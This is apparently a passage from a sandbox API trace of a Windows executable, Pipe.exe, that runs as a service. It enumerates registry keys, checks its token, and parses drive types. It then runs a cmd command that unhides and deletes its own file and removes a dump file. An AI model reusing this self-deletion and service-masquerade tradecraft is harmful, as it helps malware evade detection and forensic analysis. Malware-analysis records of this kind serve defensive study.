(lpString="SQMServiceList") returned 14 [0068.922] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x22) returned 0x4baa78 [0068.922] RegEnumKeyW (in: hKey=0x98, dwIndex=0x3e, lpName=0x18fd58, cchName=0x104 | out: lpName="Srp") returned 0x0 [0068.922] lstrlenW (lpString="Srp") returned 3 [0068.922] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x14) returned 0x4b9da0 [0068.922] RegEnumKeyW (in: hKey=0x98, dwIndex=0x3f, lpName=0x18fd58, cchName=0x104 | out: lpName="SrpExtensionConfig") returned 0x0 [0068.922] lstrlenW (lpString="SrpExtensionConfig") returned 18 [0068.922] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x14) returned 0x4b9dc0 [0068.922] RegEnumKeyW (in: hKey=0x98, dwIndex=0x40, lpName=0x18fd58, cchName=0x104 | out: lpName="StillImage") returned 0x0 [0068.922] lstrlenW (lpString="StillImage") returned 10 [0068.922] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x18) returned 0x4b9dc0 [0068.922] RegEnumKeyW (in: hKey=0x98, dwIndex=0x41, lpName=0x18fd58, cchName=0x104 | out: lpName="Storage") returned 0x0 [0068.922] lstrlenW (lpString="Storage") returned 7 [0068.922] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1c) returned 0x4ba490 [0068.922] RegEnumKeyW (in: hKey=0x98, dwIndex=0x42, lpName=0x18fd58, cchName=0x104 | out: lpName="SystemResources") returned 0x0 [0068.922] lstrlenW (lpString="SystemResources") returned 15 [0068.922] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1a) returned 0x4ba4b8 [0068.922] RegEnumKeyW (in: hKey=0x98, dwIndex=0x43, lpName=0x18fd58, cchName=0x104 | out: lpName="TabletPC") returned 0x0 [0068.922] lstrlenW (lpString="TabletPC") returned 8 [0068.922] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1a) returned 0x4ba4e0 [0068.923] RegEnumKeyW (in: hKey=0x98, dwIndex=0x44, lpName=0x18fd58, cchName=0x104 | out: lpName="Terminal Server") returned 0x0 [0068.923] lstrlenW (lpString="Terminal Server") returned 15 [0068.923] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1e) returned 0x4ba508 [0068.923] RegEnumKeyW (in: hKey=0x98, dwIndex=0x45, lpName=0x18fd58, cchName=0x104 | out: lpName="TimeZoneInformation") returned 0x0 [0068.923] lstrlenW (lpString="TimeZoneInformation") returned 19 [0068.923] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x16) returned 0x4b9e00 [0068.923] RegEnumKeyW (in: hKey=0x98, dwIndex=0x46, lpName=0x18fd58, cchName=0x104 | out: lpName="usbflags") returned 0x0 [0068.923] lstrlenW (lpString="usbflags") returned 8 [0068.923] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1e) returned 0x4ba558 [0068.923] RegEnumKeyW (in: hKey=0x98, dwIndex=0x47, lpName=0x18fd58, cchName=0x104 | out: lpName="usbstor") returned 0x0 [0068.923] lstrlenW (lpString="usbstor") returned 7 [0068.923] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1c) returned 0x4ba580 [0068.923] RegEnumKeyW (in: hKey=0x98, dwIndex=0x48, lpName=0x18fd58, cchName=0x104 | out: lpName="VAN") returned 0x0 [0068.923] lstrlenW (lpString="VAN") returned 3 [0068.923] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x14) returned 0x4b9e40 [0068.923] RegEnumKeyW (in: hKey=0x98, dwIndex=0x49, lpName=0x18fd58, cchName=0x104 | out: lpName="Video") returned 0x0 [0068.923] lstrlenW (lpString="Video") returned 5 [0068.923] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x18) returned 0x4b9e60 [0068.924] RegEnumKeyW (in: hKey=0x98, dwIndex=0x4a, lpName=0x18fd58, cchName=0x104 | out: lpName="wcncsvc") returned 0x0 [0068.924] lstrlenW (lpString="wcncsvc") returned 7 [0068.924] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1c) returned 0x4ba5a8 [0068.924] RegEnumKeyW (in: hKey=0x98, dwIndex=0x4b, lpName=0x18fd58, cchName=0x104 | out: lpName="Wdf") returned 0x0 [0068.924] lstrlenW (lpString="Wdf") returned 3 [0068.924] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x14) returned 0x4b9e80 [0068.924] RegEnumKeyW (in: hKey=0x98, dwIndex=0x4c, lpName=0x18fd58, cchName=0x104 | out: lpName="WDI") returned 0x0 [0068.924] lstrlenW (lpString="WDI") returned 3 [0068.924] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x14) returned 0x4b9ea0 [0068.924] RegEnumKeyW (in: hKey=0x98, dwIndex=0x4d, lpName=0x18fd58, cchName=0x104 | out: lpName="Windows") returned 0x0 [0068.924] lstrlenW (lpString="Windows") returned 7 [0068.924] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1c) returned 0x4ba5d0 [0068.924] RegEnumKeyW (in: hKey=0x98, dwIndex=0x4e, lpName=0x18fd58, cchName=0x104 | out: lpName="Winlogon") returned 0x0 [0068.924] lstrlenW (lpString="Winlogon") returned 8 [0068.924] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1e) returned 0x4ba5f8 [0068.924] RegEnumKeyW (in: hKey=0x98, dwIndex=0x4f, lpName=0x18fd58, cchName=0x104 | out: lpName="WMI") returned 0x0 [0068.924] lstrlenW (lpString="WMI") returned 3 [0068.924] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x14) returned 0x4b9ec0 [0068.925] RegEnumKeyW (in: hKey=0x98, dwIndex=0x50, lpName=0x18fd58, cchName=0x104 | out: lpName="hivelist") returned 0x0 [0068.925] lstrlenW (lpString="hivelist") returned 8 [0068.925] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1e) returned 0x4ba620 [0068.925] RegEnumKeyW (in: hKey=0x98, dwIndex=0x51, lpName=0x18fd58, cchName=0x104 | out: lpName="SystemInformation") returned 0x0 [0068.925] lstrlenW (lpString="SystemInformation") returned 17 [0068.925] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1a) returned 0x4ba648 [0068.925] RegEnumKeyW (in: hKey=0x98, dwIndex=0x52, lpName=0x18fd58, cchName=0x104 | out: lpName="Winresume") returned 0x0 [0068.925] lstrlenW (lpString="Winresume") returned 9 [0068.925] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x20) returned 0x4ba648 [0068.925] RegEnumKeyW (in: hKey=0x98, dwIndex=0x53, lpName=0x18fd58, cchName=0x104 | out: lpName="winresume") returned 0x103 [0068.925] RegCloseKey (hKey=0x98) returned 0x0 [0068.925] GetCommandLineW () returned="C:\\Windows\\SysWOW64\\Pipe.exe -s" [0068.925] StrChrW (lpStart="C:\\Windows\\SysWOW64\\Pipe.exe -s", wMatch=0x20) returned=" -s" [0068.925] StrTrimW (in: psz="-s", pszTrimChars=" " | out: psz="-s") returned 0 [0068.925] GetVersion () returned 0x1db10106 [0068.925] GetCurrentProcess () returned 0xffffffff [0068.925] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20008, TokenHandle=0x18ff24 | out: TokenHandle=0x18ff24*=0x98) returned 1 [0068.925] GetTokenInformation (in: TokenHandle=0x98, TokenInformationClass=0x14, TokenInformation=0x18ff1c, TokenInformationLength=0x4, ReturnLength=0x18ff28 | out: TokenInformation=0x18ff1c, ReturnLength=0x18ff28) returned 1 [0068.925] GetTokenInformation (in: TokenHandle=0x98, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18ff28 | out: TokenInformation=0x0, ReturnLength=0x18ff28) returned 0 [0068.925] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x14) returned 0x4b9ee0 [0068.925] GetTokenInformation (in: TokenHandle=0x98, TokenInformationClass=0x19, TokenInformation=0x4b9ee0, TokenInformationLength=0x14, ReturnLength=0x18ff28 | out: TokenInformation=0x4b9ee0, ReturnLength=0x18ff28) returned 1 [0068.925] GetSidSubAuthorityCount (pSid=0x4b9ee8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000)) returned 0x4b9ee9 [0068.926] GetSidSubAuthority (pSid=0x4b9ee8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000), nSubAuthority=0x0) returned 0x4b9ef0 [0068.926] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9ee0 | out: hHeap=0x4a0000) returned 1 [0068.926] CloseHandle (hObject=0x98) returned 1 [0068.926] CommandLineToArgvW (in: lpCmdLine="-s", pNumArgs=0x18ff64 | out: pNumArgs=0x18ff64) returned 0x4aeca0*="-s" [0068.926] lstrlenW (lpString="-s") returned 2 [0068.926] StartServiceCtrlDispatcherW (lpServiceTable=0x18ff38*(lpServiceName="Pipe", lpServiceProc=0x1001e44)) returned 1 [0069.345] SetEvent (hEvent=0xd8) returned 1 [0099.631] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9368 | out: hHeap=0x4a0000) returned 1 [0099.631] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b93c8 | out: hHeap=0x4a0000) returned 1 [0099.631] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9a60 | out: hHeap=0x4a0000) returned 1 [0099.631] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9b00 | out: hHeap=0x4a0000) returned 1 [0099.631] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9bc0 | out: hHeap=0x4a0000) returned 1 [0099.631] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9c80 | out: hHeap=0x4a0000) returned 1 [0099.631] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b91a8 | out: hHeap=0x4a0000) returned 1 [0099.631] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b91c8 | out: hHeap=0x4a0000) returned 1 [0099.631] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b93a8 | out: hHeap=0x4a0000) returned 1 [0099.631] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b93e8 | out: hHeap=0x4a0000) returned 1 [0099.631] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b99a0 | out: hHeap=0x4a0000) returned 1 [0099.632] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9a40 | out: hHeap=0x4a0000) returned 1 [0099.632] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9a80 | out: hHeap=0x4a0000) returned 1 [0099.632] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9ac0 | out: hHeap=0x4a0000) returned 1 [0099.632] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9b60 | out: hHeap=0x4a0000) returned 1 [0099.632] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9b80 | out: hHeap=0x4a0000) returned 1 [0099.632] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9c00 | out: hHeap=0x4a0000) returned 1 [0099.632] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9c40 | out: hHeap=0x4a0000) returned 1 [0099.632] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9c60 | out: hHeap=0x4a0000) returned 1 [0099.632] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9da0 | out: hHeap=0x4a0000) returned 1 [0099.632] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9e40 | out: hHeap=0x4a0000) returned 1 [0099.632] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9e80 | out: hHeap=0x4a0000) returned 1 [0099.632] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9ea0 | out: hHeap=0x4a0000) returned 1 [0099.632] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9ec0 | out: hHeap=0x4a0000) returned 1 [0099.632] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9188 | out: hHeap=0x4a0000) returned 1 [0099.632] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b98c8 | out: hHeap=0x4a0000) returned 1 [0099.632] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b99c0 | out: hHeap=0x4a0000) returned 1 [0099.632] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9a20 | out: hHeap=0x4a0000) returned 1 [0099.632] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9ba0 | out: hHeap=0x4a0000) returned 1 [0099.632] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9c20 | out: hHeap=0x4a0000) returned 1 [0099.632] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9ce0 | out: hHeap=0x4a0000) returned 1 [0099.632] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9d00 | out: hHeap=0x4a0000) returned 1 [0099.632] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9d20 | out: hHeap=0x4a0000) returned 1 [0099.632] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9d40 | out: hHeap=0x4a0000) returned 1 [0099.632] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9d60 | out: hHeap=0x4a0000) returned 1 [0099.632] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9d80 | out: hHeap=0x4a0000) returned 1 [0099.632] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9e00 | out: hHeap=0x4a0000) returned 1 [0099.632] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9e20 | out: hHeap=0x4a0000) returned 1 [0099.632] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9388 | out: hHeap=0x4a0000) returned 1 [0099.632] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b98e8 | out: hHeap=0x4a0000) returned 1 [0099.633] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9908 | out: hHeap=0x4a0000) returned 1 [0099.633] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b99e0 | out: hHeap=0x4a0000) returned 1 [0099.633] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9a00 | out: hHeap=0x4a0000) returned 1 [0099.633] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9aa0 | out: hHeap=0x4a0000) returned 1 [0099.633] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9ae0 | out: hHeap=0x4a0000) returned 1 [0099.633] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9b20 | out: hHeap=0x4a0000) returned 1 [0099.633] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9b40 | out: hHeap=0x4a0000) returned 1 [0099.633] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9be0 | out: hHeap=0x4a0000) returned 1 [0099.633] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9ca0 | out: hHeap=0x4a0000) returned 1 [0099.633] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9cc0 | out: hHeap=0x4a0000) returned 1 [0099.633] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9dc0 | out: hHeap=0x4a0000) returned 1 [0099.633] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9de0 | out: hHeap=0x4a0000) returned 1 [0099.633] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9e60 | out: hHeap=0x4a0000) returned 1 [0099.633] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b3e90 | out: hHeap=0x4a0000) returned 1 [0099.633] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b3ee0 | out: hHeap=0x4a0000) returned 1 [0099.633] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b4048 | out: hHeap=0x4a0000) returned 1 [0099.633] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b4070 | out: hHeap=0x4a0000) returned 1 [0099.633] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b4160 | out: hHeap=0x4a0000) returned 1 [0099.633] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b41d8 | out: hHeap=0x4a0000) returned 1 [0099.633] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ba260 | out: hHeap=0x4a0000) returned 1 [0099.633] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ba350 | out: hHeap=0x4a0000) returned 1 [0099.633] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ba378 | out: hHeap=0x4a0000) returned 1 [0099.633] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ba4e0 | out: hHeap=0x4a0000) returned 1 [0099.633] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ba530 | out: hHeap=0x4a0000) returned 1 [0099.633] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b3eb8 | out: hHeap=0x4a0000) returned 1 [0099.633] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b3f08 | out: hHeap=0x4a0000) returned 1 [0099.633] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b3f58 | out: hHeap=0x4a0000) returned 1 [0099.634] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b3f80 | out: hHeap=0x4a0000) returned 1 [0099.634] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b3ff8 | out: hHeap=0x4a0000) returned 1 [0099.634] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b40e8 | out: hHeap=0x4a0000) returned 1 [0099.634] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b4188 | out: hHeap=0x4a0000) returned 1 [0099.634] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ba288 | out: hHeap=0x4a0000) returned 1 [0099.634] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ba300 | out: hHeap=0x4a0000) returned 1 [0099.634] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ba328 | out: hHeap=0x4a0000) returned 1 [0099.634] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ba3a0 | out: hHeap=0x4a0000) returned 1 [0099.634] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ba418 | out: hHeap=0x4a0000) returned 1 [0099.634] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ba440 | out: hHeap=0x4a0000) returned 1 [0099.634] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ba468 | out: hHeap=0x4a0000) returned 1 [0099.634] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ba490 | out: hHeap=0x4a0000) returned 1 [0099.634] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ba580 | out: hHeap=0x4a0000) returned 1 [0099.634] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ba5a8 | out: hHeap=0x4a0000) returned 1 [0099.634] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ba5d0 | out: hHeap=0x4a0000) returned 1 [0099.634] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b3e68 | out: hHeap=0x4a0000) returned 1 [0099.634] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b3f30 | out: hHeap=0x4a0000) returned 1 [0099.634] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b3fa8 | out: hHeap=0x4a0000) returned 1 [0099.634] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b3fd0 | out: hHeap=0x4a0000) returned 1 [0099.634] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b40c0 | out: hHeap=0x4a0000) returned 1 [0099.634] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b4110 | out: hHeap=0x4a0000) returned 1 [0099.634] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b4138 | out: hHeap=0x4a0000) returned 1 [0099.634] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ba2b0 | out: hHeap=0x4a0000) returned 1 [0099.634] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ba2d8 | out: hHeap=0x4a0000) returned 1 [0099.634] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ba3c8 | out: hHeap=0x4a0000) returned 1 [0099.634] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ba508 | out: hHeap=0x4a0000) returned 1 [0099.634] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ba558 | out: hHeap=0x4a0000) returned 1 [0099.634] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ba5f8 | out: hHeap=0x4a0000) returned 1 [0099.634] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ba620 | out: hHeap=0x4a0000) returned 1 [0099.635] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b4020 | out: hHeap=0x4a0000) returned 1 [0099.635] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b4098 | out: hHeap=0x4a0000) returned 1 [0099.635] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b41b0 | out: hHeap=0x4a0000) returned 1 [0099.635] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ba3f0 | out: hHeap=0x4a0000) returned 1 [0099.635] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ba4b8 | out: hHeap=0x4a0000) returned 1 [0099.635] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ba648 | out: hHeap=0x4a0000) returned 1 [0099.635] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9898 | out: hHeap=0x4a0000) returned 1 [0099.635] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ba1b8 | out: hHeap=0x4a0000) returned 1 [0099.635] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ba1e8 | out: hHeap=0x4a0000) returned 1 [0099.635] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ba218 | out: hHeap=0x4a0000) returned 1 [0099.635] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4baa48 | out: hHeap=0x4a0000) returned 1 [0099.635] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4baa78 | out: hHeap=0x4a0000) returned 1 [0099.635] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9958 | out: hHeap=0x4a0000) returned 1 [0099.635] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ba188 | out: hHeap=0x4a0000) returned 1 [0099.635] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9928 | out: hHeap=0x4a0000) returned 1 [0099.635] lstrlenW (lpString="C:\\Windows\\SysWOW64\\Pipe.exe") returned 28 [0099.635] lstrcmpW (lpString1=".exe", lpString2=":bin") returned -1 [0099.635] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xda) returned 0x500a28 [0099.635] _snwprintf (in: _Dest=0x500a28, _Count=0x6d, _Format="cmd /c choice /t %u /d y & attrib -h \"%s\" & del \"%s\"" | out: _Dest="cmd /c choice /t 10 /d y & attrib -h \"C:\\Windows\\SysWOW64\\Pipe.exe\" & del \"C:\\Windows\\SysWOW64\\Pipe.exe\"") returned 104 [0099.635] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="cmd /c choice /t 10 /d y & attrib -h \"C:\\Windows\\SysWOW64\\Pipe.exe\" & del \"C:\\Windows\\SysWOW64\\Pipe.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18fef8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18ff3c | out: lpCommandLine="cmd /c choice /t 10 /d y & attrib -h \"C:\\Windows\\SysWOW64\\Pipe.exe\" & del \"C:\\Windows\\SysWOW64\\Pipe.exe\"", lpProcessInformation=0x18ff3c*(hProcess=0xe0, hThread=0xc0, dwProcessId=0xa4c, dwThreadId=0x24c)) returned 1 [0099.658] CloseHandle (hObject=0xc0) returned 1 [0099.658] CloseHandle (hObject=0xe0) returned 1 [0099.658] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x500a28 | out: hHeap=0x4a0000) returned 1 [0099.658] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x0) returned 0x100416a [0099.658] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0xffffffff [0099.658] CloseHandle (hObject=0x94) returned 1 [0099.658] DeleteFileW (lpFileName="C:\\Windows\\TEMP\\Pipe.dmp" (normalized: "c:\\windows\\temp\\pipe.dmp")) returned 1 [0099.661] ExitProcess (uExitCode=0x0) Thread: id = 328 os_tid = 0x9ac Thread: id = 329 os_tid = 0x738 Thread: id = 330 os_tid = 0x97c [0068.941] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xd8 [0068.941] RegisterServiceCtrlHandlerW (lpServiceName="Pipe", lpHandlerProc=0x1006862) returned 0x4bded8 [0068.941] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1006d62, lpParameter=0x100a5d4, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xdc [0068.941] SetServiceStatus (hServiceStatus=0x4bded8, lpServiceStatus=0xf4ff4c*(dwServiceType=0x30, dwCurrentState=0x4, dwControlsAccepted=0x5, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0068.968] WaitForMultipleObjects (nCount=0x2, lpHandles=0xf4ff68*=0xd8, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0x0 [0099.622] SetServiceStatus (hServiceStatus=0x4bded8, lpServiceStatus=0xf4ff4c*(dwServiceType=0x30, dwCurrentState=0x3, dwControlsAccepted=0x5, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0099.624] CloseHandle (hObject=0xdc) returned 1 [0099.624] SetServiceStatus (hServiceStatus=0x4bded8, lpServiceStatus=0xf4ff4c*(dwServiceType=0x30, dwCurrentState=0x1, dwControlsAccepted=0x5, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0099.629] CloseHandle (hObject=0xd8) returned 1 Thread: id = 331 os_tid = 0x92c [0068.942] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x14) returned 0x4ba0e0 [0068.942] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1e) returned 0x4bdf50 [0068.942] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x36) returned 0x4bc5a8 [0068.968] _wcslwr (in: _String=0x4bc5a8 | out: _String="movable|fixed|remote|share") returned="movable|fixed|remote|share" [0068.968] StrChrW (lpStart="movable|fixed|remote|share", wMatch=0x7c) returned="|fixed|remote|share" [0068.968] StrChrW (lpStart="fixed|remote|share", wMatch=0x7c) returned="|remote|share" [0068.968] StrChrW (lpStart="remote|share", wMatch=0x7c) returned="|share" [0068.968] StrChrW (lpStart="share", wMatch=0x7c) returned 0x0 [0068.968] lstrlenW 